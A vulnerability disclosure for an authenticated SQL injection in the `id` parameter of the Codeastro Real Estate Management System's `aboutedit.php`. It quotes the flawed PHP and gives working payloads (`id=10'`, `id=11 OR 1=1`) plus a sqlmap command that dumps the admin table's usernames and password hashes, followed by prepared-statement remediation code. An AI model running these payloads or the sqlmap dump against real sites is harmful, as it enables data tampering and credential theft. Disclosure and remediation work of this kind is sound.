- Application Name: Codeastro Real Estate Management System
- Software Link: Download Link
- Vendor Homepage: Vendor Homepage
- Bug: Authenticated SQL Injection
- Bug Author: egsec
- This Real Estate Management System is a PHP project focused on publishing and viewing properties. More precisely, it keeps a catalogue of sales and rental listings that an administrator maintains through an admin panel.
- An SQL injection vulnerability exists in the `id` parameter of the `aboutedit.php` page within the admin panel of the application. An attacker who can reach this page (an authenticated admin-panel user or anyone holding a valid admin session) can alter the SQL statement executed by the server by injecting SQL syntax through the `id` parameter.
Vulnerable code in `aboutedit.php`:

```php
...
$aid = $_GET['id'];   // untrusted value taken straight from the query string
...
// $aid is interpolated unquoted into the WHERE clause; $title, $content and $aimage
// are interpolated inside quotes, but also without escaping or parameterization
$sql = "UPDATE about SET title = '{$title}' , content = '{$content}', image ='{$aimage}' WHERE id = {$aid}";
...
```
- In the code above, the `id` value from the `$_GET` superglobal is placed directly into the SQL string without validation, escaping or parameterization. Because it is not even quoted, anything that follows the number becomes part of the `WHERE` clause, so an attacker controls which rows the `UPDATE` touches and can append further SQL logic.
- Put a single quote in the `id` parameter => `http://localhost/RealEstate-PHP/admin/aboutedit.php?id=10'`:
  The query now ends in `WHERE id = 10'`, which is a MySQL syntax error, so the update fails instead of completing normally. A quote changing the outcome of the request shows it is parsed as part of the SQL statement rather than treated as data.
- Use the payload `aboutedit.php?id=11 OR 1=1` and notice that every "About Page" is affected: the condition is true for every row, so the `UPDATE` overwrites all rows of the `about` table with the submitted title, content and image instead of only the row with id 11.
  The statement the server executes:

```sql
UPDATE about SET title = '...', content = '...', image = '...' WHERE id = 11 OR 1=1;
```
- After confirming the injection, exploitation can be automated with sqlmap. The `*` marks the injection point inside the URL, `--dbms MySQL` skips fingerprinting, and `-D realestatephp -T admin --dump` extracts the `admin` table:

```shell
python3.12 sqlmap.py -u "http://localhost/RealEstate-PHP/admin/aboutedit.php?id=10*" --dbms MySQL -D realestatephp -T admin --dump
```

  Because `aboutedit.php` sits behind the admin login, the request must carry a valid admin session (for example via sqlmap's `--cookie` option). Note also that the injection point is inside an `UPDATE` statement, so every test request modifies rows of the `about` table rather than only reading; run this against a disposable test instance.
  sqlmap dumps the contents of the `admin` table (usernames and password hashes of the administrators):
- PoC video: link
- This SQL injection allows an attacker with access to the admin panel to rewrite the database query issued through the `id` parameter. Exploiting it can lead to unauthorized modification of stored data (as the `OR 1=1` payload shows), disclosure of other tables such as `admin`, and, depending on database privileges, full compromise of the backing database. The consequences are data loss, exposure of sensitive information and compliance violations. Immediate remediation is required to protect the integrity of the application and its data.
- Prepared Statements: Rewrite the query with `prepare()` and `bind_param()`. The SQL text is sent to the server once, with `?` placeholders, and the values are bound afterwards, so user input can never change the structure of the statement.
- Data Type Binding: `bind_param()` declares the type of each parameter (e.g. `"sssi"` for string, string, string, integer). With `id` bound as an integer, a value such as `11 OR 1=1` cannot reach the `WHERE` clause as SQL. Validate `id` as a positive integer before binding as well, so malformed input is rejected instead of being silently coerced.
- Validation and Escaping: Prepared statements remove the need for manual escaping, because the bound values travel separately from the query text and quotes inside them are treated as data, not syntax. Input validation on length and format is still worthwhile for the title, content and image fields.
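As an added example (not code from the page or from the Codeastro project), the following shows how the `aboutedit.php` update could be written with mysqli prepared statements as the remediation bullets describe. The table and column names and the `"sssi"` binding are those the page documents; the connection credentials, the function names, and the assumption that `title`, `content` and `image` arrive as form fields are assumptions for the example.

```php
<?php
// Added example, not the project's own code: hardened replacement for the
// UPDATE in admin/aboutedit.php. Table/column names and the "sssi" binding
// follow the page; connection details, function names and the form field
// names (title, content, image) are assumptions.
declare(strict_types=1);

// Make mysqli throw on errors so a failed prepare()/execute() cannot be missed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Accept the id parameter only if it is a positive integer.
 * Values such as "10'" or "11 OR 1=1" are rejected here instead of
 * being silently coerced to 10 / 11 by the integer binding below.
 */
function parseAboutId(array $query): ?int
{
    $id = filter_var(
        $query['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    return $id === false ? null : $id;
}

/**
 * Read a form field as a string; anything missing or non-scalar becomes "".
 */
function formString(array $post, string $key): string
{
    $value = $post[$key] ?? '';
    return is_string($value) ? $value : '';
}

/**
 * Update a single About row with a prepared statement.
 * The SQL text is constant; the values are sent separately and bound as
 * string, string, string, integer ("sssi"), so quotes or boolean logic
 * inside them can never alter the WHERE clause.
 * Returns the number of rows MySQL reports as changed (0 when the id does
 * not exist or the new values equal the stored ones).
 */
function updateAbout(
    mysqli $conn,
    int $aid,
    string $title,
    string $content,
    string $aimage
): int {
    $stmt = $conn->prepare(
        'UPDATE about SET title = ?, content = ?, image = ? WHERE id = ?'
    );
    $stmt->bind_param('sssi', $title, $content, $aimage, $aid);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

// Request handling (assumed flow: id from the query string, fields from the form).
$aid = parseAboutId($_GET);
if ($aid === null) {
    http_response_code(400);
    exit('invalid id');
}

$title   = formString($_POST, 'title');
$content = formString($_POST, 'content');
$aimage  = formString($_POST, 'image');

// Placeholder credentials; the database name is the one used in the sqlmap command above.
$conn = new mysqli('localhost', 'dbuser', 'dbpass', 'realestatephp');
$conn->set_charset('utf8mb4');

$rows = updateAbout($conn, $aid, $title, $content, $aimage);
echo $rows > 0 ? 'About page updated' : 'Nothing changed';
```

With this structure the payloads from the write-up stop working: `id=10'` and `id=11 OR 1=1` are rejected by `parseAboutId()` with a 400 before any query runs, and even if validation were skipped, the `i` binding would hand the server a single integer, never a `WHERE` clause fragment. The explicit validation matters because `bind_param()` alone coerces `"11 OR 1=1"` to `11` without complaint, which would hide probing attempts rather than surface them.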